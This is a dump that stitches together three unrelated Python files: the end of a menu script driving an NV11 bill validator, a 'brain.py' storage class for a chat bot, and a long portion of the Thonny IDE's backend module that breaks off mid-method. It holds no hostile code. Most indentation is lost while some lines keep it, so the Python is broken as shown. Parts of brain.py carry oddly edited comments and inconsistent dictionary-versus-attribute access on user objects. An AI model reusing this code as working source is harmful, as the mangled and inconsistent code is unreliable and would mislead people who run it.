elif choice == "c": # Route to cashbox ( In NV11, it is any amount <= than "choice" )
choice = input("")
validator.set_route_cashbox(int(choice))
elif choice == "e": # Enable ( Automaticaly disabled after a payout )
validator.enable_validator()
elif choice == "r": # Reset ( It's like a "reboot" of the validator )
validator.reset()
elif choice == "y": # NV11 Payout last entered ( next available )
print("Payout next 1")
validator.nv11_payout_next_note()
elif choice == "d": # Disable
validator.disable_validator()
elif choice == "D": # Disable the payout device
validator.disable_payout()
elif choice == "E": # Empty the storage to the cashbox
validator.empty_storage()
elif choice == "g": # Get the number of bills denominated with their values
choice = input("")
validator.get_note_amount(int(choice))
sleep(1)
print("Number of bills of %s : %s"%(choice, validator.response_data['getnoteamount_response']))
except KeyboardInterrupt:  # If the user presses CTRL+C
validator.close() # Close the connection with the validator
print("Exiting")
exit(0)
|
brain.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import time
import threading
from event_emitter import EventEmitter
from pybot.user import User
class Brain(EventEmitter):
"""
Represents somewhat persistent storage for the robot. Extend this.
Returns a new Brain with no external storage.
"""
def __init__(self, robot):
super(Brain, self).__init__()
self.data = {
'users' : {},
'_private' : {}
}
self.auto_save = True
self.save_interval = None
self.stop_event = threading.Event()
robot.on("running", lambda: self.reset_save_interval(5))
    def set(self, key, value=None):
        """
        Public:
        Store key-value pair under the private namespace and extend
        existing self.data before emitting the 'loaded' event.
        Returns the instance for chaining.
        """
        # A dict may be passed as `key` to set several pairs at once
        # (this covers the original "check object instance" memo).
        pair = key if isinstance(key, dict) else {key: value}
        self.extend(self.data['_private'], pair)
        self.emit('loaded', self.data)
        return self
def get(self, key):
"""
Public:
Get value by key from the private namespace in self.data
        or return None if not found.
Returns the value.
"""
        if key in self.data['_private']:
            return self.data['_private'][key]
else:
return None
def remove(self, key):
"""
Public:
Remove value by key from the private namespace in self.data
if it exists
Returns the instance for chaining.
"""
        if key in self.data['_private']:
            self.data['_private'].pop(key)
return self
def save(self):
"""
Public:
Emits the 'save' event so that 'brain' scripts can handle persisting.
Returns nothing.
"""
self.emit('save', self.data)
def close(self):
"""
Public:
Emits the 'close' event so that 'brain' scripts can handle closing.
Returns nothing.
"""
self.clear_interval()
self.save()
self.emit('close')
def set_auto_save(self, enabled):
"""
Public:
Enable or disable the automatic saving
enabled : A boolean whether to autosave or not
Returns nothing.
"""
self.auto_save = enabled
def reset_save_interval(self, seconds):
"""
Public:
Reset the interval between save function calls.
seconds : An Integer of seconds between saves.
Returns nothing.
"""
if self.save_interval:
self.clear_interval()
if self.auto_save:
self.set_interval(self.save, seconds)
def set_interval(self, callback, delay):
def _target():
while not self.stop_event.is_set():
time.sleep(delay)
callback()
self.thread = threading.Thread(target=_target)
self.thread.start()
self.save_interval = True
def clear_interval(self):
self.stop_event.set()
self.thread.join()
self.save_interval = False
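    # Note: stop_event is never cleared, so once clear_interval() has run, a later
    # set_interval() thread will exit immediately; restarting autosave would require
    # recreating the Event (not done here).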
def merge_data(self, data):
"""
Public:
Merge keys loaded from a DB against the in memory representation.
Returns nothing.
        Caveats:
Deeply nested structures don't merge well.
"""
for key in (data or {}):
self.data[key] = data[key]
self.emit('loaded', self.data)
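        # e.g. (sketch): merge_data({'users': {...}}) replaces the whole top-level
        # 'users' entry rather than merging it, which is what the caveat above warns about.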
def users(self):
"""
Public:
Get an Array of User objects stored in the brain.
Returns an Array of User objects.
"""
        return self.data['users']
def user_for_id(self, id, options):
"""
Public:
Get a User object given a unique identifier.
Returns a User instance of the specified user.
"""
try:
user = self.data['users'][id]
except KeyError:
user = User(id, options)
self.data['users'][id] = user
        if (options
            and options.get('room')
            and (not user.room or user.room != options['room'])):
user = User(id, options)
self.data['users'][id] = user
return user
def user_for_name(self, name):
"""
Public:
Get a User object given a name.
Returns a User instance for the user with the specified name.
"""
result = None
lower_name = name.lower()
        for key in (self.data['users'] or {}):
            user_name = self.data['users'][key]['name']
            if user_name and str(user_name).lower() == lower_name:
                result = self.data['users'][key]
return result
def users_for_raw_fuzzy_name(self, fuzzy_name):
"""
Public:
Get all users whose names match fuzzy_name. Currently, match
means 'starts with', but this could be extended to match initials,
nicknames, etc.
Returns an Array of User instances matching the fuzzy name.
"""
lower_fuzzy_name = fuzzy_name.lower()
users = []
        for user in (self.data['users'] or {}).values():
            if user.name.lower().startswith(lower_fuzzy_name):
                users.append(user)
return users
def users_for_fuzzy_name(self, fuzzy_name):
"""
Public:
If fuzzy_name is an exact match for a user, returns an array with
just that user. Otherwise, returns an array of all users for which
fuzzy_name is a raw fuzzy match (see users_for_raw_fuzzy_name)
Returns an Array of User instances matching the fuzzy name.
"""
        matched_users = self.users_for_raw_fuzzy_name(fuzzy_name)
        lower_fuzzy_name = fuzzy_name.lower()
        for user in matched_users:
            if user.name.lower() == lower_fuzzy_name:
return [user]
return matched_users
def extend(self, obj, *sources):
"""
Private:
Extend obj with objects passed as additional args.
Returns the original object with updated changes.
"""
for source in sources:
for key, val in source.items():
                obj[key] = val
return obj
|
backend.py
|
# -*- coding: utf-8 -*-
import ast
import builtins
import copy
import functools
import importlib
import inspect
import io
import logging
import os.path
import pkgutil
import pydoc
import re
import signal
import site
import subprocess
import sys
import tokenize
import traceback
import types
import warnings
from collections import namedtuple
from importlib.machinery import PathFinder, SourceFileLoader
from threading import Thread
import __main__ # @UnresolvedImport
import _ast
import thonny
from thonny.common import (
BackendEvent,
DebuggerCommand,
DebuggerResponse,
FrameInfo,
InlineCommand,
InlineResponse,
InputSubmission,
TextRange,
ToplevelCommand,
ToplevelResponse,
UserError,
ValueInfo,
parse_message,
path_startswith,
range_contains_smaller,
range_contains_smaller_or_equal,
serialize_message,
get_exe_dirs,
get_augmented_system_path,
update_system_path,
is_same_path,
)
import queue
BEFORE_STATEMENT_MARKER = "_thonny_hidden_before_stmt"
BEFORE_EXPRESSION_MARKER = "_thonny_hidden_before_expr"
AFTER_STATEMENT_MARKER = "_thonny_hidden_after_stmt"
AFTER_EXPRESSION_MARKER = "_thonny_hidden_after_expr"
logger = logging.getLogger("thonny.backend")
_CONFIG_FILENAME = os.path.join(thonny.THONNY_USER_DIR, "backend_configuration.ini")
TempFrameInfo = namedtuple(
"TempFrameInfo",
[
"system_frame",
"locals",
"globals",
"event",
"focus",
"node_tags",
"current_statement",
"current_root_expression",
"current_evaluations",
],
)
_vm = None
class VM:
def __init__(self):
global _vm
_vm = self
self._ini = None
self._command_handlers = {}
self._object_info_tweakers = []
self._import_handlers = {}
self._input_queue = queue.Queue()
self._source_preprocessors = []
self._ast_postprocessors = []
self._main_dir = os.path.dirname(sys.modules["thonny"].__file__)
self._heap = {} # WeakValueDictionary would be better, but can't store reference to None
self._source_info_by_frame = {}
site.sethelper() # otherwise help function is not available
pydoc.pager = pydoc.plainpager # otherwise help command plays tricks
self._install_fake_streams()
self._current_executor = None
self._io_level = 0
self._tty_mode = True
self._tcl = None
# clean up path
sys.path = [d for d in sys.path if d != ""]
# start in shell mode
sys.argv[:] = [""] # empty "script name"
sys.path.insert(0, "") # current dir
# clean __main__ global scope
for key in list(__main__.__dict__.keys()):
if not key.startswith("__") or key in {"__file__", "__cached__"}:
del __main__.__dict__[key]
        # unset __doc__ so that exec dares to write the doc of the script there
__main__.__doc__ = None
self._frontend_sys_path = ast.literal_eval(os.environ["THONNY_FRONTEND_SYS_PATH"])
self._load_shared_modules()
self._load_plugins()
self._install_signal_handler()
def mainloop(self):
try:
while True:
try:
cmd = self._fetch_command()
if isinstance(cmd, InputSubmission):
self._input_queue.put(cmd)
elif isinstance(cmd, ToplevelCommand):
self._source_info_by_frame = {}
self._input_queue = queue.Queue()
self.handle_command(cmd)
else:
self.handle_command(cmd)
except KeyboardInterrupt:
logger.exception("Interrupt in mainloop")
# Interrupt must always result in waiting_toplevel_command state
# Don't show error messages, as the interrupted command may have been InlineCommand
# (handlers of ToplevelCommands in normal cases catch the interrupt and provide
# relevant message)
self.send_message(ToplevelResponse())
except Exception:
logger.exception("Crash in mainloop")
traceback.print_exc()
def add_command(self, command_name, handler):
"""Handler should be 1-argument function taking command object.
Handler may return None (in this case no response is sent to frontend)
or a BackendResponse
"""
self._command_handlers[command_name] = handler
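        # e.g. (sketch, handler is illustrative):
        #   vm.add_command("my_cmd", lambda cmd: InlineResponse("my_cmd", ok=True))
        # returning None from a handler means no response is sent to the frontend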
def add_object_info_tweaker(self, tweaker):
"""Tweaker should be 2-argument function taking value and export record"""
self._object_info_tweakers.append(tweaker)
def add_import_handler(self, module_name, handler):
if module_name not in self._import_handlers:
self._import_handlers[module_name] = []
self._import_handlers[module_name].append(handler)
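        # e.g. (sketch): vm.add_import_handler("turtle", tweak_turtle_module)
        # the special name "*" registers a handler that runs for every imported module
        # (see _custom_import below)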
def add_source_preprocessor(self, func):
self._source_preprocessors.append(func)
def add_ast_postprocessor(self, func):
self._ast_postprocessors.append(func)
def get_main_module(self):
return __main__
def handle_command(self, cmd):
assert isinstance(cmd, (ToplevelCommand, InlineCommand))
def create_error_response(**kw):
if isinstance(cmd, ToplevelCommand):
return ToplevelResponse(command_name=cmd.name, **kw)
else:
return InlineResponse(command_name=cmd.name, **kw)
if cmd.name in self._command_handlers:
handler = self._command_handlers[cmd.name]
else:
handler = getattr(self, "_cmd_" + cmd.name, None)
if handler is None:
response = create_error_response(error="Unknown command: " + cmd.name)
else:
try:
response = handler(cmd)
except SystemExit:
# Must be caused by Thonny or plugins code
if isinstance(cmd, ToplevelCommand):
traceback.print_exc()
response = create_error_response(SystemExit=True)
except UserError as e:
sys.stderr.write(str(e) + "\n")
response = create_error_response()
except KeyboardInterrupt:
response = create_error_response(user_exception=self._prepare_user_exception())
except Exception:
_report_internal_error()
response = create_error_response(context_info="other unhandled exception")
if response is False:
# Command doesn't want to send any response
return
if response is None and isinstance(cmd, ToplevelCommand):
# create simple default response
response = ToplevelResponse(command_name=cmd.name)
# TODO: add these in response creation time in a helper function
if isinstance(response, ToplevelResponse):
response["gui_is_active"] = (
self._get_tcl() is not None or self._get_qt_app() is not None
)
self.send_message(response)
def get_option(self, name, default=None):
section, subname = self._parse_option_name(name)
val = self._get_ini().get(section, subname, fallback=default)
try:
return ast.literal_eval(val)
except Exception:
return val
def set_option(self, name, value):
ini = self._get_ini()
section, subname = self._parse_option_name(name)
if not ini.has_section(section):
ini.add_section(section)
if not isinstance(value, str):
value = repr(value)
ini.set(section, subname, value)
self.save_settings()
def switch_env_to_script_mode(self, cmd):
if "" in sys.path:
sys.path.remove("") # current directory
filename = cmd.args[0]
if os.path.isfile(filename):
sys.path.insert(0, os.path.abspath(os.path.dirname(filename)))
__main__.__dict__["__file__"] = filename
def _parse_option_name(self, name):
if "." in name:
return name.split(".", 1)
else:
return "general", name
def _get_ini(self):
if self._ini is None:
import configparser
self._ini = configparser.ConfigParser(interpolation=None)
self._ini.read(_CONFIG_FILENAME)
return self._ini
def save_settings(self):
if self._ini is None:
return
with open(_CONFIG_FILENAME, "w") as fp:
self._ini.write(fp)
def _custom_import(self, *args, **kw):
module = self._original_import(*args, **kw)
if not hasattr(module, "__name__"):
return module
# module specific handlers
for handler in self._import_handlers.get(module.__name__, []):
try:
handler(module)
except Exception:
_report_internal_error()
# general handlers
for handler in self._import_handlers.get("*", []):
try:
handler(module)
except Exception:
_report_internal_error()
return module
def _load_shared_modules(self):
self.load_modules_with_frontend_path(["parso", "jedi", "thonnycontrib", "six", "asttokens"])
def load_modules_with_frontend_path(self, names):
from importlib import import_module
original_sys_path = sys.path
try:
sys.path = sys.path + self._frontend_sys_path
for name in names:
try:
import_module(name)
except ImportError:
pass
finally:
sys.path = original_sys_path
def _load_plugins(self):
# built-in plugins
import thonny.plugins.backend # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.backend.__path__, "thonny.plugins.backend.")
# 3rd party plugins from namespace package
try:
import thonnycontrib.backend # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.backend.__path__, "thonnycontrib.backend.")
def _load_plugins_from_path(self, path, prefix):
load_function_name = "load_plugin"
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[1]):
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
f = getattr(m, load_function_name)
sig = inspect.signature(f)
if len(sig.parameters) == 0:
f()
else:
f(self)
except Exception:
logger.exception("Failed loading plugin '" + module_name + "'")
def _install_signal_handler(self):
def signal_handler(signal_, frame):
raise KeyboardInterrupt("Execution interrupted")
if os.name == "nt":
signal.signal(signal.SIGBREAK, signal_handler) # @UndefinedVariable
else:
signal.signal(signal.SIGINT, signal_handler)
def _cmd_get_environment_info(self, cmd):
return ToplevelResponse(
main_dir=self._main_dir,
path=sys.path,
usersitepackages=site.getusersitepackages() if site.ENABLE_USER_SITE else None,
prefix=sys.prefix,
welcome_text="Python " + _get_python_version_string(),
executable=sys.executable,
exe_dirs=get_exe_dirs(),
in_venv=(
hasattr(sys, "base_prefix")
and sys.base_prefix != sys.prefix
or hasattr(sys, "real_prefix")
and getattr(sys, "real_prefix") != sys.prefix
),
python_version=_get_python_version_string(),
cwd=os.getcwd(),
)
def _cmd_cd(self, cmd):
if len(cmd.args) == 1:
path = cmd.args[0]
try:
os.chdir(path)
return ToplevelResponse()
except FileNotFoundError:
raise UserError("No such folder: " + path)
except OSError as e:
raise UserError("\n".join(traceback.format_exception_only(type(e), e)))
else:
raise UserError("cd takes one parameter")
def _cmd_Run(self, cmd):
self.switch_env_to_script_mode(cmd)
return self._execute_file(cmd, SimpleRunner)
def _cmd_run(self, cmd):
return self._execute_file(cmd, SimpleRunner)
def _cmd_FastDebug(self, cmd):
self.switch_env_to_script_mode(cmd)
return self._execute_file(cmd, FastTracer)
def _cmd_Debug(self, cmd):
self.switch_env_to_script_mode(cmd)
return self._execute_file(cmd, NiceTracer)
def _cmd_debug(self, cmd):
return self._execute_file(cmd, NiceTracer)
def _cmd_execute_source(self, cmd):
"""Executes Python source entered into shell"""
self._check_update_tty_mode(cmd)
filename = "<pyshell>"
ws_stripped_source = cmd.source.strip()
source = ws_stripped_source.strip("?")
num_stripped_question_marks = len(ws_stripped_source) - len(source)
# let's see if it's single expression or something more complex
try:
root = ast.parse(source, filename=filename, mode="exec")
except SyntaxError as e:
error = "".join(traceback.format_exception_only(type(e), e))
sys.stderr.write(error)
return ToplevelResponse()
assert isinstance(root, ast.Module)
if len(root.body) == 1 and isinstance(root.body[0], ast.Expr):
mode = "eval"
elif len(root.body) > 1 and isinstance(root.body[-1], ast.Expr):
mode = "exec+eval"
else:
mode = "exec"
result_attributes = self._execute_source(
source,
filename,
mode,
NiceTracer if getattr(cmd, "debug_mode", False) else SimpleRunner,
cmd,
)
result_attributes["num_stripped_question_marks"] = num_stripped_question_marks
return ToplevelResponse(command_name="execute_source", **result_attributes)
def _cmd_execute_system_command(self, cmd):
self._check_update_tty_mode(cmd)
env = dict(os.environ).copy()
encoding = "utf-8"
env["PYTHONIOENCODING"] = encoding
# Make sure this python interpreter and its scripts are available
# in PATH
update_system_path(env, get_augmented_system_path(get_exe_dirs()))
popen_kw = dict(
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
env=env,
universal_newlines=True,
)
if sys.version_info >= (3, 6):
popen_kw["errors"] = "replace"
popen_kw["encoding"] = encoding
assert cmd.cmd_line.startswith("!")
cmd_line = cmd.cmd_line[1:]
proc = subprocess.Popen(cmd_line, **popen_kw)
def copy_stream(source, target):
while True:
c = source.readline()
if c == "":
break
else:
target.write(c)
copy_out = Thread(target=lambda: copy_stream(proc.stdout, sys.stdout), daemon=True)
copy_err = Thread(target=lambda: copy_stream(proc.stderr, sys.stderr), daemon=True)
copy_out.start()
copy_err.start()
try:
proc.wait()
except KeyboardInterrupt as e:
print(str(e), file=sys.stderr)
copy_out.join()
copy_err.join()
def _cmd_process_gui_events(self, cmd):
# advance the event loop
try:
# First try Tkinter.
# Need to update even when tkinter._default_root is None
# because otherwise destroyed window will stay up in macOS.
# When switching between closed user Tk window and another window,
# the closed window may reappear in IDLE and CLI REPL
tcl = self._get_tcl()
            if tcl is not None and (tcl.has_default_root or tcl.updates_without_root < 1):
# http://bugs.python.org/issue989712
# http://bugs.python.org/file6090/run.py.diff
# https://bugs.python.org/review/989712/diff/4528/Lib/idlelib/run.py
tcl.eval("update")
# if not tcl.has_default_root:
# tcl.updates_without_root += 1
else:
# Try Qt only when Tkinter is not used
app = self._get_qt_app()
if app is not None:
app.processEvents()
except Exception:
pass
return False
def _cmd_get_globals(self, cmd):
warnings.warn("_cmd_get_globals is deprecated for CPython")
try:
return InlineResponse(
"get_globals",
module_name=cmd.module_name,
globals=self.export_globals(cmd.module_name),
)
except Exception as e:
return InlineResponse("get_globals", module_name=cmd.module_name, error=str(e))
def _cmd_get_frame_info(self, cmd):
atts = {}
try:
# TODO: make it work also in past states
frame, location = self._lookup_frame_by_id(cmd["frame_id"])
if frame is None:
atts["error"] = "Frame not found"
else:
atts["code_name"] = frame.f_code.co_name
atts["module_name"] = frame.f_globals["__name__"]
atts["locals"] = (
None
if frame.f_locals is frame.f_globals
else self.export_variables(frame.f_locals)
)
atts["globals"] = self.export_variables(frame.f_globals)
atts["freevars"] = frame.f_code.co_freevars
atts["location"] = location
except Exception as e:
atts["error"] = str(e)
return InlineResponse("get_frame_info", frame_id=cmd.frame_id, **atts)
def _cmd_get_active_distributions(self, cmd):
try:
# if it is called after first installation to user site packages
# this dir is not yet in sys.path
if (
site.ENABLE_USER_SITE
and site.getusersitepackages()
and os.path.exists(site.getusersitepackages())
and site.getusersitepackages() not in sys.path
):
# insert before first site packages item
for i, item in enumerate(sys.path):
if "site-packages" in item or "dist-packages" in item:
sys.path.insert(i, site.getusersitepackages())
break
else:
sys.path.append(site.getusersitepackages())
import pkg_resources
pkg_resources._initialize_master_working_set()
dists = {
dist.key: {
"project_name": dist.project_name,
"key": dist.key,
"location": dist.location,
"version": dist.version,
}
for dist in pkg_resources.working_set
} # pylint: disable=not-an-iterable
return InlineResponse(
"get_active_distributions",
distributions=dists,
usersitepackages=site.getusersitepackages() if site.ENABLE_USER_SITE else None,
)
except Exception:
return InlineResponse("get_active_distributions", error=traceback.format_exc())
def _cmd_get_locals(self, cmd):
for frame in inspect.stack():
if id(frame) == cmd.frame_id:
return InlineResponse("get_locals", locals=self.export_variables(frame.f_locals))
raise RuntimeError("Frame '{0}' not found".format(cmd.frame_id))
def _cmd_get_heap(self, cmd):
result = {}
for key in self._heap:
result[key] = self.export_value(self._heap[key])
return InlineResponse("get_heap", heap=result)
def _cmd_shell_autocomplete(self, cmd):
error = None
try:
import jedi
except ImportError:
completions = []
error = "Could not import jedi"
else:
try:
# with warnings.catch_warnings():
interpreter = jedi.Interpreter(cmd.source, [__main__.__dict__])
completions = self._export_completions(interpreter.completions())
except Exception as e:
completions = []
error = "Autocomplete error: " + str(e)
return InlineResponse(
"shell_autocomplete", source=cmd.source, completions=completions, error=error
)
def _cmd_editor_autocomplete(self, cmd):
error = None
try:
import jedi
self._debug(jedi.__file__, sys.path)
with warnings.catch_warnings():
script = jedi.Script(cmd.source, cmd.row, cmd.column, cmd.filename)
completions = self._export_completions(script.completions())
except ImportError:
completions = []
error = "Could not import jedi"
except Exception as e:
completions = []
error = "Autocomplete error: " + str(e)
return InlineResponse(
"editor_autocomplete",
source=cmd.source,
row=cmd.row,
column=cmd.column,
filename=cmd.filename,
completions=completions,
error=error,
)
def _cmd_Reset(self, cmd):
if len(cmd.args) == 0:
# nothing to do, because Reset always happens in fresh process
return ToplevelResponse(
command_name="Reset",
welcome_text="Python " + _get_python_version_string(),
executable=sys.executable,
)
else:
raise UserError("Command 'Reset' doesn't take arguments")
def _export_completions(self, jedi_completions):
result = []
for c in jedi_completions:
if not c.name.startswith("__"):
record = {
"name": c.name,
"complete": c.complete,
"type": c.type,
"description": c.description,
}
""" TODO:
try:
if c.type in ["class", "module", "function"]:
if c.type == "function":
record["docstring"] = c.docstring()
else:
record["docstring"] = c.description + "\n" + c.docstring()
except Exception:
pass
"""
result.append(record)
return result
def _cmd_get_object_info(self, cmd):
if isinstance(self._current_executor, NiceTracer) and self._current_executor.is_in_past():
info = {"id": cmd.object_id, "error": "past info not available"}
elif cmd.object_id in self._heap:
value = self._heap[cmd.object_id]
attributes = {}
if cmd.include_attributes:
for name in dir(value):
if not name.startswith("__") or cmd.all_attributes:
# attributes[name] = inspect.getattr_static(value, name)
try:
attributes[name] = getattr(value, name)
except Exception:
pass
self._heap[id(type(value))] = type(value)
info = {
"id": cmd.object_id,
"repr": repr(value),
"type": str(type(value)),
"full_type_name": str(type(value))
.replace("<class '", "")
.replace("'>", "")
.strip(),
"type_id": id(type(value)),
"attributes": self.export_variables(attributes),
}
if isinstance(value, io.TextIOWrapper):
self._add_file_handler_info(value, info)
elif isinstance(
value,
(
types.BuiltinFunctionType,
types.BuiltinMethodType,
types.FunctionType,
types.LambdaType,
types.MethodType,
),
):
self._add_function_info(value, info)
elif isinstance(value, (list, tuple, set)):
self._add_elements_info(value, info)
elif isinstance(value, dict):
self._add_entries_info(value, info)
elif hasattr(value, "image_data"):
info["image_data"] = value.image_data
for tweaker in self._object_info_tweakers:
try:
tweaker(value, info, cmd)
except Exception:
logger.exception("Failed object info tweaker: " + str(tweaker))
else:
info = {"id": cmd.object_id, "error": "object info not available"}
return InlineResponse("get_object_info", id=cmd.object_id, info=info)
def _get_tcl(self):
if self._tcl is not None:
return self._tcl
tkinter = sys.modules.get("tkinter")
if tkinter is None:
return None
if self._tcl is None:
try:
self._tcl = tkinter.Tcl()
self._tcl.updates_without_root = 0
except Exception:
pass
self._tcl.has_default_root = tkinter._default_root is not None
return self._tcl
def _get_qt_app(self):
mod = sys.modules.get("PyQt5.QtCore")
if mod is None:
mod = sys.modules.get("PyQt4.QtCore")
if mod is None:
mod = sys.modules.get("PySide.QtCore")
if mod is None:
return None
app_class = getattr(mod, "QCoreApplication", None)
if app_class is not None:
try:
return app_class.instance()
except Exception:
return None
else:
return None
def _add_file_handler_info(self, value, info):
try:
assert isinstance(value.name, str)
assert value.mode in ("r", "rt", "tr", "br", "rb")
assert value.errors in ("strict", None)
assert value.newlines is None or value.tell() > 0
# TODO: cache the content
# TODO: don't read too big files
with open(value.name, encoding=value.encoding) as f:
info["file_encoding"] = f.encoding
info["file_content"] = f.read()
info["file_tell"] = value.tell()
except Exception as e:
info["file_error"] = "Could not get file content, error:" + str(e)
def _add_function_info(self, value, info):
try:
info["source"] = inspect.getsource(value)
except Exception:
pass
def _add_elements_info(self, value, info):
info["elements"] = []
for element in value:
info["elements"].append(self.export_value(element))
def _add_entries_info(self, value, info):
info["entries"] = []
for key in value:
info["entries"].append((self.export_value(key), self.export_value(value[key])))
def _execute_file(self, cmd, executor_class):
self._check_update_tty_mode(cmd)
if len(cmd.args) >= 1:
sys.argv = cmd.args
filename = cmd.args[0]
if os.path.isabs(filename):
full_filename = filename
else:
full_filename = os.path.abspath(filename)
with tokenize.open(full_filename) as fp:
source = fp.read()
for preproc in self._source_preprocessors:
source = preproc(source, cmd)
result_attributes = self._execute_source(
source, full_filename, "exec", executor_class, cmd, self._ast_postprocessors
)
result_attributes["filename"] = full_filename
return ToplevelResponse(command_name=cmd.name, **result_attributes)
else:
raise UserError("Command '%s' takes at least one argument" % cmd.name)
def _execute_source(
self, source, filename, execution_mode, executor_class, cmd, ast_postprocessors=[]
):
self._current_executor = executor_class(self, cmd)
try:
return self._current_executor.execute_source(
source, filename, execution_mode, ast_postprocessors
)
finally:
self._current_executor = None
def _install_fake_streams(self):
self._original_stdin = sys.stdin
self._original_stdout = sys.stdout
self._original_stderr = sys.stderr
# yes, both out and err will be directed to out (but with different tags)
# this allows client to see the order of interleaving writes to stdout/stderr
sys.stdin = VM.FakeInputStream(self, sys.stdin)
sys.stdout = VM.FakeOutputStream(self, sys.stdout, "stdout")
sys.stderr = VM.FakeOutputStream(self, sys.stdout, "stderr")
# fake it properly: replace also "backup" streams
sys.__stdin__ = sys.stdin
sys.__stdout__ = sys.stdout
sys.__stderr__ = sys.stderr
def _install_custom_import(self):
self._original_import = builtins.__import__
builtins.__import__ = self._custom_import
def _restore_original_import(self):
builtins.__import__ = self._original_import
def _fetch_command(self):
line = self._original_stdin.readline()
if line == "":
logger.info("Read stdin EOF")
sys.exit()
cmd = parse_message(line)
return cmd
def send_message(self, msg):
if "cwd" not in msg:
msg["cwd"] = os.getcwd()
if isinstance(msg, ToplevelResponse) and "globals" not in msg:
msg["globals"] = self.export_globals()
self._original_stdout.write(serialize_message(msg) + "\n")
self._original_stdout.flush()
def export_value(self, value, max_repr_length=5000):
self._heap[id(value)] = value
try:
rep = repr(value)
except Exception:
# See https://bitbucket.org/plas/thonny/issues/584/problem-with-thonnys-back-end-obj-no
rep = "??? <repr error>"
if len(rep) > max_repr_length:
rep = rep[:max_repr_length] + "…"
return ValueInfo(id(value), rep)
def export_variables(self, variables):
result = {}
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for name in variables:
if not name.startswith("__"):
result[name] = self.export_value(variables[name], 100)
return result
def export_globals(self, module_name="__main__"):
if module_name in sys.modules:
return self.export_variables(sys.modules[module_name].__dict__)
else:
raise RuntimeError("Module '{0}' is not loaded".format(module_name))
def _debug(self, *args):
logger.debug("VM: " + str(args))
def _enter_io_function(self):
self._io_level += 1
def _exit_io_function(self):
self._io_level -= 1
def is_doing_io(self):
return self._io_level > 0
def _export_stack(self, newest_frame, relevance_checker=None):
result = []
system_frame = newest_frame
while system_frame is not None:
module_name = system_frame.f_globals["__name__"]
code_name = system_frame.f_code.co_name
if not relevance_checker or relevance_checker(system_frame):
source, firstlineno, in_library = self._get_frame_source_info(system_frame)
result.insert(
0,
FrameInfo(
# TODO: can this id be reused by a later frame?
                    # Need to store the reference to avoid GC?
# I guess it is not required, as id will be required
# only for stacktrace inspection, and sys.last_exception
# will have the reference anyway
# (NiceTracer has its own reference keeping)
id=id(system_frame),
filename=system_frame.f_code.co_filename,
module_name=module_name,
code_name=code_name,
locals=self.export_variables(system_frame.f_locals),
globals=self.export_variables(system_frame.f_globals),
freevars=system_frame.f_code.co_freevars,
source=source,
lineno=system_frame.f_lineno,
firstlineno=firstlineno,
in_library=in_library,
event="line",
focus=TextRange(system_frame.f_lineno, 0, system_frame.f_lineno + 1, 0),
node_tags=None,
current_statement=None,
current_evaluations=None,
current_root_expression=None,
),
)
if module_name == "__main__" and code_name == "<module>":
# this was last frame relevant to the user
break
system_frame = system_frame.f_back
assert result # not empty
return result
def _lookup_frame_by_id(self, frame_id):
def lookup_from_stack(frame):
if frame is None:
return None
elif id(frame) == frame_id:
return frame
else:
return lookup_from_stack(frame.f_back)
def lookup_from_tb(entry):
if entry is None:
return None
elif id(entry.tb_frame) == frame_id:
return entry.tb_frame
else:
return lookup_from_tb(entry.tb_next)
result = lookup_from_stack(inspect.currentframe())
if result is not None:
return result, "stack"
        if getattr(sys, "last_traceback", None):
result = lookup_from_tb(getattr(sys, "last_traceback"))
if result:
return result, "last_traceback"
_, _, tb = sys.exc_info()
return lookup_from_tb(tb), "current_exception"
def _get_frame_source_info(self, frame):
fid = id(frame)
if fid not in self._source_info_by_frame:
self._source_info_by_frame[fid] = _fetch_frame_source_info(frame)
return self._source_info_by_frame[fid]
def _prepare_user_exception(self):
e_type, e_value, e_traceback = sys.exc_info()
sys.last_type, sys.last_value, sys.last_traceback = (e_type, e_value, e_traceback)
processed_tb = traceback.extract_tb(e_traceback)
tb = e_traceback
while tb.tb_next is not None:
tb = tb.tb_next
last_frame = tb.tb_frame
if e_type is SyntaxError:
# Don't show ast frame
while last_frame.f_code.co_filename and last_frame.f_code.co_filename == ast.__file__:
last_frame = last_frame.f_back
if e_type is SyntaxError:
msg = (
traceback.format_exception_only(e_type, e_value)[-1]
.replace(e_type.__name__ + ":", "")
.strip()
)
else:
msg = str(e_value)
return {
"type_name": e_type.__name__,
"message": msg,
"stack": self._export_stack(last_frame),
"items": format_exception_with_frame_info(e_type, e_value, e_traceback),
"filename": getattr(e_value, "filename", processed_tb[-1].filename),
"lineno": getattr(e_value, "lineno", processed_tb[-1].lineno),
"col_offset": getattr(e_value, "offset", None),
"line": getattr(e_value, "text", processed_tb[-1].line),
}
def _check_update_tty_mode(self, cmd):
if "tty_mode" in cmd:
self._tty_mode = cmd["tty_mode"]
class FakeStream:
def __init__(self, vm, target_stream):
self._vm = vm
self._target_stream = target_stream
self._processed_symbol_count = 0
def isatty(self):
return self._vm._tty_mode and (os.name != "nt" or "click" not in sys.modules)
def __getattr__(self, name):
# TODO: is it safe to perform those other functions without notifying vm
# via _enter_io_function?
return getattr(self._target_stream, name)
class FakeOutputStream(FakeStream):
def __init__(self, vm, target_stream, stream_name):
VM.FakeStream.__init__(self, vm, target_stream)
self._stream_name = stream_name
def write(self, data):
try:
self._vm._enter_io_function()
# click may send bytes instead of strings
if isinstance(data, bytes):
data = data.decode(errors="replace")
if data != "":
self._vm.send_message(
BackendEvent("ProgramOutput", stream_name=self._stream_name, data=data)
)
self._processed_symbol_count += len(data)
finally:
self._vm._exit_io_function()
def writelines(self, lines):
try:
self._vm._enter_io_function()
self.write("".join(lines))
finally:
self._vm._exit_io_function()
class FakeInputStream(FakeStream):
def _generic_read(self, method, limit=-1):
# is there some queued input?
if not self._vm._input_queue.empty():
cmd = self._vm._input_queue.get()
self._processed_symbol_count += len(cmd.data)
return cmd.data
# new input needs to be requested
try:
self._vm._enter_io_function()
self._vm.send_message(BackendEvent("InputRequest", method=method, limit=limit))
while True:
cmd = self._vm._fetch_command()
if isinstance(cmd, InputSubmission):
self._processed_symbol_count += len(cmd.data)
return cmd.data
elif isinstance(cmd, InlineCommand):
self._vm.handle_command(cmd)
else:
